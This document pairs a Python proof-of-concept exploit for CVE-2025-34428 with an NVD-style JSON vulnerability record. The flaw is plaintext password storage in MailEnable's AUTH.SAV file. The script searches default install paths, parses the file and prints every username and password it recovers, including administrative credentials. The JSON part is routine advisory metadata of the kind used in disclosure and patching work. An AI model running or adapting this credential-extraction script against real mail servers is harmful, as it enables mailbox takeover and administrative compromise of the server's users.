CVE-2025-34428

#!/usr/bin/env python3 # CVE-2025-34428 PoC - MailEnable AUTH.SAV Cleartext Credential Storage # This PoC demonstrates reading plaintext credentials from AUTH.SAV file import os import sys def read_auth_sav(file_path): """ Read and parse MailEnable AUTH.SAV file AUTH.SAV format typically contains username:password pairs """ credentials = [] try: with open(file_path, 'r', encoding='utf-8', errors='ignore') as f: for line in f: line = line.strip() if ':' in line: parts = line.split(':') if len(parts) >= 2: username = parts[0] password = parts[1] if len(parts) > 1 else '' credentials.append({'username': username, 'password': password}) except FileNotFoundError: print(f"[-] File not found: {file_path}") return [] except PermissionError: print(f"[-] Permission denied: {file_path}") return [] return credentials def main(): # Default MailEnable installation paths default_paths = [ r'C:\Program Files\Mail Enable\Config\AUTH.SAV', r'C:\Program Files (x86)\Mail Enable\Config\AUTH.SAV', r'/opt/mailenable/config/AUTH.SAV', r'/var/mailenable/config/AUTH.SAV' ] print("[*] CVE-2025-34428 - MailEnable AUTH.SAV Credential Extraction") print("[*] Target: MailEnable < 10.54") # Check if custom path provided if len(sys.argv) > 1: paths = [sys.argv[1]] else: paths = default_paths for path in paths: if os.path.exists(path): print(f"\n[+] Found AUTH.SAV at: {path}") creds = read_auth_sav(path) if creds: print(f"[+] Extracted {len(creds)} credential(s):") for cred in creds: print(f" Username: {cred['username']}") print(f" Password: {cred['password']}") print("-" * 40) else: print("[-] No credentials found in file") break else: print("[-] AUTH.SAV file not found in default locations") print("[*] Please provide the correct path to AUTH.SAV") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-34428", "sourceIdentifier": "[email protected]", "published": "2025-12-10T19:16:13.570", "lastModified": "2025-12-17T17:00:32.697", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MailEnable versions prior to 10.54 contain a cleartext storage of credentials vulnerability that can lead to local credential compromise and account takeover. The product stores user and administrative passwords in plaintext within AUTH.SAV with overly permissive filesystem access. A local authenticated user with read access to this file can recover all user passwords and super-admin credentials, then use them to authenticate to MailEnable services such as POP3, SMTP, or the webmail interface, enabling unauthorized mailbox access and administrative control."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-312"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mailenable:mailenable:*:*:*:*:standard:*:*:*", "versionEndExcluding": "10.54", "matchCriteriaId": "E4DAB799-EDB6-48D7-A7FD-77D9910CB308"}]}]}], "references": [{"url": "https://mailenable.com/Standard-ReleaseNotes.txt", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.mailenable.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/mailenable-cleartext-credential-storage-in-auth-sav", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}